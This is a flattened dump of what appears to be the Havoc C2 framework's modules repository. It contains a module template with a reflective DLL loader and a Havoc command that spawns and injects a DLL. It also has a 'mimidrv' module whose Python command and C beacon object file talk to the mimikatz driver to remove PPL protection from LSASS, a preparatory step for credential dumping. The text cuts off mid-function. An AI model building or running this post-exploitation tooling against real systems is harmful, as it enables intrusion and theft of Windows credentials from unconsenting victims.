https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/routeprint.x64.o 
-------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/routeprint.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/routeprint.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/sc_enum.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/sc_enum.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/sc_enum.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/sc_enum.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/sc_qc.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/sc_qc.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/sc_qc.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/sc_qc.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/sc_qdescription.x64.o: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/sc_qdescription.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/sc_qdescription.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/sc_qdescription.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/sc_qfailure.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/sc_qfailure.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/sc_qfailure.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/sc_qfailure.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/sc_qtriggerinfo.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/sc_qtriggerinfo.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/sc_qtriggerinfo.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/sc_qtriggerinfo.x86.o 
-------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/sc_query.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/sc_query.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/sc_query.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/sc_query.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/schtasksenum.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/schtasksenum.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/schtasksenum.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/schtasksenum.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/schtasksquery.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/schtasksquery.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/schtasksquery.x86.o: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/schtasksquery.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/tasklist.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/tasklist.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/tasklist.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/tasklist.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/uptime.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/uptime.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/uptime.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/uptime.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/whoami.x64.o: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/whoami.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/whoami.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/whoami.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/windowlist.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/windowlist.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/windowlist.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/windowlist.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/wmi_query.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/wmi_query.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/wmi_query.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/wmi_query.x86.o 
-------------------------------------------------------------------------------- /SituationalAwareness/makefile: -------------------------------------------------------------------------------- 1 | NAME = CS-Situational-Awareness-BOF 2 | BIN = ObjectFiles 3 | 4 | all: 5 | @cd $(NAME); chmod +x make_all.sh; bash ./make_all.sh 6 | @find $(NAME)/SA -name '*.o' -exec cp {} $(BIN)/ \; 7 | 8 | clean: 9 | rm $(BIN)/*.o 10 | -------------------------------------------------------------------------------- /Template/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required( VERSION 3.19 ) 2 | project( ModuleTemplate C ) 3 | 4 | set( PROJECT_NAME ModuleTemplate ) 5 | 6 | # set compiler settings 7 | set( CMAKE_C_STANDARD 11 ) 8 | set( CMAKE_C_COMPILER x86_64-w64-mingw32-gcc ) 9 | 10 | # adding demon sources 11 | include_directories( include ) 12 | 13 | set( COMMON_SOURCE 14 | src/Win32.c 15 | src/KaynLdr.c 16 | src/DllMain.c 17 | src/Parser.c 18 | ) 19 | 20 | 21 | # add compiled demons 22 | add_executable( ${PROJECT_NAME} ${COMMON_SOURCE} ) 23 | -------------------------------------------------------------------------------- /Template/bin/Template.x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Template/bin/Template.x64.dll -------------------------------------------------------------------------------- /Template/include/DModule.h: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | #include 5 | 6 | typedef struct _INSTANCE { 7 | 8 | struct { 9 | 10 | WIN32_FUNC( printf ) 11 | 12 | } Win32; 13 | 14 | struct { 15 | 16 | PVOID Msvcrt; 17 | 18 | } Modules; 19 | 20 | } INSTANCE, *PINSTANCE; 21 | 22 | extern INSTANCE Instance; 23 | 24 | VOID ModuleInit(); 25 | VOID ModuleMain(); 
-------------------------------------------------------------------------------- /Template/include/KaynLdr.h: -------------------------------------------------------------------------------- 1 | /** 2 | * KaynLdr 3 | * Author: Paul Ungur (@C5pider) 4 | */ 5 | 6 | #ifndef KAYNLDR_KAYNLDR_H 7 | #define KAYNLDR_KAYNLDR_H 8 | 9 | #define _NO_NTDLL_CRT_ 10 | 11 | #include 12 | #include 13 | 14 | #define DLL_QUERY_HMODULE 6 15 | 16 | #define HASH_KEY 5381 17 | 18 | #ifdef _WIN64 19 | #define PPEB_PTR __readgsqword( 0x60 ) 20 | #else 21 | #define PPEB_PTR __readgsqword( 0x30 ) 22 | #endif 23 | 24 | #define MemCopy __builtin_memcpy 25 | #define NTDLL_HASH 0x70e61753 26 | 27 | #define SYS_LDRLOADDLL 0x9e456a43 28 | #define SYS_NTALLOCATEVIRTUALMEMORY 0xf783b8ec 29 | #define SYS_NTPROTECTEDVIRTUALMEMORY 0x50e92888 30 | 31 | #define DLLEXPORT __declspec( dllexport ) 32 | #define WIN32_FUNC( x ) __typeof__( x ) * x; 33 | 34 | #define U_PTR( x ) ( ( UINT_PTR ) x ) 35 | #define C_PTR( x ) ( ( LPVOID ) x ) 36 | 37 | typedef struct { 38 | 39 | struct { 40 | WIN32_FUNC( LdrLoadDll ); 41 | WIN32_FUNC( NtAllocateVirtualMemory ) 42 | WIN32_FUNC( NtProtectVirtualMemory ) 43 | } Win32; 44 | 45 | struct { 46 | PVOID Ntdll; 47 | } Modules ; 48 | 49 | } KAYNINSTANCE, *PKAYNINSTANCE ; 50 | 51 | LPVOID KaynCaller(); 52 | 53 | typedef struct { 54 | WORD offset :12; 55 | WORD type :4; 56 | } *PIMAGE_RELOC; 57 | 58 | PVOID KGetModuleByHash( DWORD hash ); 59 | PVOID KGetProcAddressByHash( PKAYNINSTANCE Instance, PVOID DllModuleBase, DWORD FunctionHash, DWORD Ordinal ); 60 | PVOID KLoadLibrary( PKAYNINSTANCE Instance, LPSTR Module ); 61 | 62 | VOID KResolveIAT( PKAYNINSTANCE Instance, PVOID KaynImage, PVOID IatDir ); 63 | VOID KReAllocSections( PVOID KaynImage, PVOID ImageBase, PVOID Dir ); 64 | 65 | DWORD KHashString( LPVOID String, SIZE_T Size ); 66 | SIZE_T KStringLengthA( LPCSTR String ); 67 | SIZE_T KStringLengthW( LPCWSTR String ); 68 | VOID KMemSet( PVOID Destination, INT Value, SIZE_T 
Size ); 69 | SIZE_T KCharStringToWCharString( PWCHAR Destination, PCHAR Source, SIZE_T MaximumAllowed ); 70 | 71 | #endif 72 | -------------------------------------------------------------------------------- /Template/include/Parser.h: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | 4 | typedef struct { 5 | PCHAR original; 6 | PCHAR buffer; 7 | UINT32 length; 8 | } PARSER, *PPARSER ; 9 | 10 | VOID ParserNew( PPARSER parser, PCHAR buffer ); 11 | INT ParserGetInt32( PPARSER parser); 12 | PCHAR ParserGetBytes( PPARSER parser, PINT size); -------------------------------------------------------------------------------- /Template/include/Win32.h: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | -------------------------------------------------------------------------------- /Template/makefile: -------------------------------------------------------------------------------- 1 | MAKEFLAGS += -s 2 | 3 | NAME = Template 4 | 5 | COMPILER_x86 = i686-w64-mingw32-gcc 6 | COMPILER_x64 = x86_64-w64-mingw32-gcc 7 | 8 | CFLAGS = -Os -fno-asynchronous-unwind-tables -shared -masm=intel 9 | CFLAGS += -fno-ident -fpack-struct=8 -falign-functions=1 10 | CFLAGS += -s -ffunction-sections -falign-jumps=1 -w 11 | CFLAGS += -falign-labels=1 -fPIC 12 | CFLAGS += -Wl,-s,--no-seh,--enable-stdcall-fixup 13 | 14 | INCLUDE = -I include 15 | SOURCE = $(wildcard src/*.c) 16 | 17 | x64: 18 | nasm -f win64 src/Util.s -o src/Util.o 19 | $(COMPILER_x64) src/*.o $(INCLUDE) $(SOURCE) $(CFLAGS) -o bin/$(NAME).x64.dll -lntdll -luser32 20 | rm src/*.o -------------------------------------------------------------------------------- /Template/src/DllMain.c: -------------------------------------------------------------------------------- 1 | /** 2 | * KaynLdr 3 | * Author: Paul Ungur (@C5pider) 4 | */ 5 | 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | HINSTANCE hAppInstance = 
NULL; 12 | INSTANCE Instance = { 0 }; 13 | 14 | BOOL WINAPI DllMain( HINSTANCE hInstDLL, DWORD dwReason, LPVOID lpReserved ) 15 | { 16 | BOOL bReturnValue = TRUE; 17 | 18 | switch( dwReason ) 19 | { 20 | case DLL_QUERY_HMODULE: 21 | if( lpReserved != NULL ) 22 | *( HMODULE* ) lpReserved = hAppInstance; 23 | break; 24 | 25 | case DLL_PROCESS_ATTACH: 26 | { 27 | hAppInstance = hInstDLL; 28 | 29 | ModuleInit(); 30 | ModuleMain( lpReserved ); 31 | 32 | fflush( stdout ); 33 | ExitProcess( 0 ); 34 | } 35 | 36 | case DLL_PROCESS_DETACH: 37 | case DLL_THREAD_ATTACH: 38 | case DLL_THREAD_DETACH: 39 | break; 40 | } 41 | return bReturnValue; 42 | } 43 | 44 | VOID ModuleInit() 45 | { 46 | Instance.Modules.Msvcrt = LoadLibraryA( "Msvcrt" ); 47 | if ( Instance.Modules.Msvcrt ) 48 | { 49 | Instance.Win32.printf = GetProcAddress( Instance.Modules.Msvcrt, "printf" ); 50 | } 51 | } 52 | 53 | VOID ModuleMain( PVOID Params ) 54 | { 55 | PARSER Parser = { 0 }; 56 | PCHAR Test = NULL; 57 | UINT32 Size = 0; 58 | 59 | ParserNew( &Parser, Params ); 60 | 61 | Test = ParserGetBytes( &Parser, &Size ); 62 | 63 | Instance.Win32.printf( "Test [%d]: %s\n", Size, Test ); 64 | 65 | Instance.Win32.printf( "[+] Hello from KaynLdr Module\n" ); 66 | Instance.Win32.printf( "[*] Process ID: %d\n", GetCurrentProcessId()); 67 | } -------------------------------------------------------------------------------- /Template/src/Parser.c: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | 5 | VOID ParserNew( PPARSER parser, PCHAR buffer ) 6 | { 7 | UINT32 Size = 0; 8 | 9 | if ( parser == NULL ) 10 | return; 11 | 12 | memcpy( &Size, buffer, sizeof( UINT32 ) ); 13 | 14 | parser->buffer = buffer + sizeof( UINT32 ); 15 | parser->original = buffer; 16 | parser->length = Size - sizeof( UINT32 ); 17 | } 18 | 19 | INT32 ParserGetInt32( PPARSER parser ) 20 | { 21 | INT32 intBytes = 0; 22 | 23 | if ( parser->length < 4 ) 24 | return 0; 25 | 26 | memcpy( 
&intBytes, parser->buffer, 4 ); 27 | 28 | parser->buffer += 4; 29 | parser->length -= 4; 30 | 31 | return ( INT ) intBytes; 32 | } 33 | 34 | PCHAR ParserGetBytes( PPARSER parser, PINT size ) 35 | { 36 | UINT32 length = 0; 37 | PCHAR outdata = NULL; 38 | 39 | if ( parser->length < 4 ) 40 | return NULL; 41 | 42 | memcpy( &length, parser->buffer, 4 ); 43 | parser->buffer += 4; 44 | 45 | outdata = parser->buffer; 46 | if ( outdata == NULL ) 47 | return NULL; 48 | 49 | parser->length -= 4; 50 | parser->length -= length; 51 | parser->buffer += length; 52 | 53 | if ( size != NULL ) 54 | *size = length; 55 | 56 | return outdata; 57 | } -------------------------------------------------------------------------------- /Template/src/Util.s: -------------------------------------------------------------------------------- 1 | ; KaynLdr 2 | ; Author: Paul Ungur (@C5pider) 3 | ; Credits: Austin Hudson (@ilove2pwn_), Chetan Nayak (@NinjaParanoid), Bobby Cooke (@0xBoku), @trickster012 4 | ; 5 | 6 | global KaynCaller 7 | 8 | section .text 9 | 10 | ; Shameless copied from Bobby Cooke CobaltStrikeReflectiveLoader (https://github.com/boku7/CobaltStrikeReflectiveLoader) 11 | KaynCaller: 12 | call pop 13 | pop: 14 | pop rcx 15 | loop: 16 | xor rbx, rbx 17 | mov ebx, 0x5A4D 18 | dec rcx 19 | cmp bx, word ds:[ rcx ] 20 | jne loop 21 | xor rax, rax 22 | mov ax, [ rcx + 0x3C ] 23 | add rax, rcx 24 | xor rbx, rbx 25 | add bx, 0x4550 26 | cmp bx, word ds:[ rax ] 27 | jne loop 28 | mov rax, rcx 29 | ret -------------------------------------------------------------------------------- /Template/src/Win32.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/Template/src/Win32.c -------------------------------------------------------------------------------- /Template/template.py: -------------------------------------------------------------------------------- 1 | from 
havoc import Demon, RegisterCommand 2 | 3 | def testdll(demonID, *param): 4 | TaskID : str = None 5 | demon : Demon = None 6 | packer = Packer() 7 | 8 | packer.addstr("test1234") 9 | 10 | demon = Demon(demonID) 11 | TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Tasked demon spawn and inject a test dll") 12 | 13 | arg = packer.getbuffer() 14 | 15 | demon.DllSpawn(TaskID, "/tmp/test.dll", arg) 16 | 17 | return TaskID 18 | 19 | RegisterCommand(testdll, "", "testdll", "spawn and inject test dll", 0, "", "") 20 | -------------------------------------------------------------------------------- /makefile: -------------------------------------------------------------------------------- 1 | SUBDIRS := $(filter-out Template, $(shell echo */)) 2 | 3 | .PHONY: all $(SUBDIRS) 4 | 5 | all: UPDATE $(SUBDIRS) 6 | 7 | UPDATE: 8 | @ echo "Updating submodules" 9 | @ git submodule update --init --recursive 10 | 11 | $(SUBDIRS): 12 | @ if [ -f $@/makefile -o -f $@/Makefile ]; then \ 13 | echo "Building $@"; \ 14 | $(MAKE) -C $@; \ 15 | else \ 16 | echo "Skipping $@ (Makefile not found)"; \ 17 | fi 18 | -------------------------------------------------------------------------------- /mimidrv/dist/mimidrv.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/mimidrv/dist/mimidrv.x64.o -------------------------------------------------------------------------------- /mimidrv/include/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Cobalt Strike 4.1. 
8 | */ 9 | 10 | #pragma once 11 | 12 | /* data API */ 13 | typedef struct { 14 | char* original; /* the original buffer [so we can free it] */ 15 | char* buffer; /* current pointer into our buffer */ 16 | int length; /* remaining length of data */ 17 | int size; /* total size of this buffer */ 18 | } datap; 19 | 20 | DECLSPEC_IMPORT void BeaconDataParse(datap* parser, char* buffer, int size); 21 | DECLSPEC_IMPORT int BeaconDataInt(datap* parser); 22 | DECLSPEC_IMPORT short BeaconDataShort(datap* parser); 23 | DECLSPEC_IMPORT int BeaconDataLength(datap* parser); 24 | DECLSPEC_IMPORT char* BeaconDataExtract(datap* parser, int* size); 25 | 26 | /* format API */ 27 | typedef struct { 28 | char* original; /* the original buffer [so we can free it] */ 29 | char* buffer; /* current pointer into our buffer */ 30 | int length; /* remaining length of data */ 31 | int size; /* total size of this buffer */ 32 | } formatp; 33 | 34 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp* format, int maxsz); 35 | DECLSPEC_IMPORT void BeaconFormatReset(formatp* format); 36 | DECLSPEC_IMPORT void BeaconFormatFree(formatp* format); 37 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp* format, char* text, int len); 38 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp* format, char* fmt, ...); 39 | DECLSPEC_IMPORT char* BeaconFormatToString(formatp* format, int* size); 40 | DECLSPEC_IMPORT void BeaconFormatInt(formatp* format, int value); 41 | 42 | /* Output Functions */ 43 | #define CALLBACK_OUTPUT 0x0 44 | #define CALLBACK_OUTPUT_OEM 0x1e 45 | #define CALLBACK_ERROR 0x0d 46 | #define CALLBACK_OUTPUT_UTF8 0x20 47 | 48 | DECLSPEC_IMPORT void BeaconPrintf(int type, char* fmt, ...); 49 | DECLSPEC_IMPORT void BeaconOutput(int type, char* data, int len); 50 | 51 | /* Token Functions */ 52 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 53 | DECLSPEC_IMPORT void BeaconRevertToken(VOID); 54 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(VOID); 55 | 56 | /* Spawn+Inject Functions */ 57 | DECLSPEC_IMPORT 
void BeaconGetSpawnTo(BOOL x86, char* buffer, int length);
DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char* payload, int p_len, int p_offset, char* arg, int a_len);
DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION* pInfo, char* payload, int p_len, int p_offset, char* arg, int a_len);
DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION* pInfo);

/* Utility Functions */
DECLSPEC_IMPORT BOOL toWideChar(char* src, wchar_t* dst, int max);
-------------------------------------------------------------------------------- /mimidrv/include/entry.h: --------------------------------------------------------------------------------
/*
 * entry.h - declarations for the mimidrv BOF (source/entry.c).
 *
 * Declares the few kernel32 imports the object file needs, the request
 * structure handed to the driver and the IOCTL code that selects the
 * driver's process-protection handler.
 */

#include 
#include "beacon.h"
#include 

/* Device name of the driver; entry.c prefixes it with \\.\ when opening it. */
#define MIMIKATZ_DRIVER L"mimidrv"

/*
 * BOF-style dynamic function resolution: each Win32 API is declared under
 * the LIBRARY$Function name the BOF loader resolves at run time, and a
 * macro maps the ordinary name onto it so entry.c reads like plain Win32.
 */
WINBASEAPI BOOL WINAPI KERNEL32$DeviceIoControl(HANDLE, DWORD, LPVOID, DWORD, LPVOID, DWORD, LPDWORD, LPOVERLAPPED);
#define DeviceIoControl KERNEL32$DeviceIoControl

WINBASEAPI DWORD WINAPI KERNEL32$GetLastError();
#define GetLastError KERNEL32$GetLastError

WINBASEAPI HLOCAL WINAPI KERNEL32$LocalAlloc(UINT uFlags, SIZE_T uBytes);
#define LocalAlloc KERNEL32$LocalAlloc

WINBASEAPI HLOCAL WINAPI KERNEL32$LocalFree(HLOCAL hMem);
#define LocalFree KERNEL32$LocalFree

WINBASEAPI HANDLE WINAPI KERNEL32$CreateFileW (LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
#define CreateFileW KERNEL32$CreateFileW

WINBASEAPI WINBOOL WINAPI KERNEL32$CloseHandle (HANDLE hObject);
#define CloseHandle KERNEL32$CloseHandle

/*
 * Process protection descriptor. The bit layout (3-bit type, 1-bit audit,
 * 4-bit signer) mirrors the Windows PS_PROTECTION byte. entry.c sends this
 * zero-filled, which is the "no protection" value.
 */
typedef struct _PS_PROTECTION {
    UCHAR Type : 3;    /* protection type; 0 = none */
    UCHAR Audit : 1;
    UCHAR Signer: 4;   /* signer class; 0 = none */
} PS_PROTECTION, *PPS_PROTECTION;

/*
 * Signature levels plus the protection byte. The KIWI_ prefix suggests the
 * layout is taken from mimikatz's kernel module — not verifiable from here.
 */
typedef struct _KIWI_PROCESS_SIGNATURE_PROTECTION {
    UCHAR SignatureLevel;
    UCHAR 
SectionSignatureLevel;
    PS_PROTECTION Protection;
} KIWI_PROCESS_SIGNATURE_PROTECTION, *PKIWI_PROCESS_SIGNATURE_PROTECTION;

/* Request body for IOCTL_MIMIDRV_PROCESS_PROTECT: the target PID and the protection state to apply to it. */
typedef struct _MIMIDRV_PROCESS_PROTECT_INFORMATION {
    ULONG processId;
    KIWI_PROCESS_SIGNATURE_PROTECTION SignatureProtection;
} MIMIDRV_PROCESS_PROTECT_INFORMATION, *PMIMIDRV_PROCESS_PROTECT_INFORMATION;

/*
 * Function 0x012 on a FILE_DEVICE_UNKNOWN device. METHOD_NEITHER hands the
 * driver the caller's buffer pointers directly rather than a kernel copy,
 * and the access mask requires a handle opened for both read and write
 * (entry.c opens the device with GENERIC_READ | GENERIC_WRITE).
 */
#define IOCTL_MIMIDRV_PROCESS_PROTECT CTL_CODE(FILE_DEVICE_UNKNOWN, 0x012, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
-------------------------------------------------------------------------------- /mimidrv/makefile: --------------------------------------------------------------------------------
# Builds only the x64 object; mimidrv.py hard-codes the matching dist/mimidrv.x64.o path.
BOFNAME := mimidrv
OPTIONS := -I include -Wall
CC_x64 := x86_64-w64-mingw32-gcc

all:
	$(CC_x64) -o dist/$(BOFNAME).x64.o -c source/entry.c $(OPTIONS)
-------------------------------------------------------------------------------- /mimidrv/mimidrv.py: --------------------------------------------------------------------------------
from havoc import Demon, RegisterCommand, RegisterModule
import re   # NOTE(review): unused in this file

def mimidrv( demonID, *params ):
    """Havoc command handler: task the agent to run the mimidrv BOF against one PID.

    Args:
        demonID: identifier of the agent the command was issued on.
        *params: exactly one positional argument, the decimal PID passed to the BOF.

    Returns:
        The task id from ``ConsoleWrite`` on success, or ``True`` after a usage
        error has been reported — the two return types are inconsistent, so a
        caller inspecting the value must expect either.
    """
    TaskID : str = None
    demon : Demon = None
    # NOTE(review): Packer is not among the names imported at the top of this file.
    packer = Packer()
    demon = Demon( demonID )

    num_params = len(params)
    pid = ''

    # Exactly one argument is accepted; anything else is reported and aborts the task.
    if num_params < 1:
        demon.ConsoleWrite( demon.CONSOLE_ERROR, "Not enough parameters" )
        return True
    elif num_params == 1:
        pid = params[ 0 ]
    elif num_params > 1:
        demon.ConsoleWrite( demon.CONSOLE_ERROR, "Too many parameters" )
        return True

    # Only the int() conversion is checked. The PID is not validated against
    # any process, so the "LSASS" wording below states intent, not a guarantee.
    try:
        pid = int( pid )
    except Exception as e:   # only ValueError/TypeError can occur here; e is unused
        demon.ConsoleWrite( demon.CONSOLE_ERROR, "Invalid PID" )
        return True

    # The BOF reads this back with BeaconDataInt() as the request's processId (source/entry.c).
    packer.adduint32(pid)

    TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to disable the PPL protection from LSASS" )

    # Entry point "go" of the x64 object the makefile produces; no x86 build exists in this module.
    demon.InlineExecute( TaskID, "go", "dist/mimidrv.x64.o", packer.getbuffer(), False )

    return TaskID
RegisterCommand( mimidrv, "", "mimidrv", "Disable PPL by interacting with the Mimidrv", 0, "", "1337" )
-------------------------------------------------------------------------------- /mimidrv/source/entry.c: --------------------------------------------------------------------------------
/*
 * entry.c - mimidrv BOF.
 *
 * Opens the \\.\mimidrv device and sends one IOCTL carrying the PID the
 * operator supplied. Nothing in this file loads or installs the driver:
 * CreateFileW is called with OPEN_EXISTING, so the open simply fails when
 * the device object is not already present. From a monitoring point of
 * view the driver load is therefore a separate, earlier event; what this
 * code produces is a handle open on the device followed by the IOCTL.
 */

#include "entry.h"

/*
 * Issue ioctlCode on an already-open driver handle.
 *
 * autobuffer == FALSE: the caller's output buffer (*pBufferOut,
 *   *pSzBufferOut) is used as-is; either pointer may be NULL, in which
 *   case no output buffer / zero length is passed.
 * autobuffer == TRUE:  a LocalAlloc(LPTR) buffer is grown from 0x10000
 *   bytes, doubling while the driver answers ERROR_MORE_DATA. On success
 *   the caller owns *pBufferOut and must LocalFree it; on failure it has
 *   already been freed here. pBufferOut and pSzBufferOut are dereferenced
 *   without a NULL check on this path.
 *
 * On success *pSzBufferOut (if non-NULL) receives the byte count the
 * driver reported. Returns the DeviceIoControl result; a failure is
 * reported to the operator via BeaconPrintf(CALLBACK_ERROR).
 */
BOOL kull_m_kernel_ioctl_handle(HANDLE hDriver, DWORD ioctlCode, PVOID bufferIn, DWORD szBufferIn, PVOID * pBufferOut, PDWORD pSzBufferOut, BOOL autobuffer)
{
    BOOL status = FALSE;
    DWORD lStatus = ERROR_MORE_DATA, returned;   /* returned is only read once status is TRUE */

    if(!autobuffer)
    {
        status = DeviceIoControl(hDriver, ioctlCode, bufferIn, szBufferIn, pBufferOut ? *pBufferOut : NULL, pSzBufferOut ? *pSzBufferOut : 0, &returned, NULL);
    }
    else
    {
        /* Exits on success, on any failure other than ERROR_MORE_DATA, or when LocalAlloc returns NULL. */
        for(*pSzBufferOut = 0x10000; (lStatus == ERROR_MORE_DATA) && (*pBufferOut = LocalAlloc(LPTR, *pSzBufferOut)) ; *pSzBufferOut <<= 1)
        {
            status = DeviceIoControl(hDriver, ioctlCode, bufferIn, szBufferIn, *pBufferOut, *pSzBufferOut, &returned, NULL);
            if(status)
            {
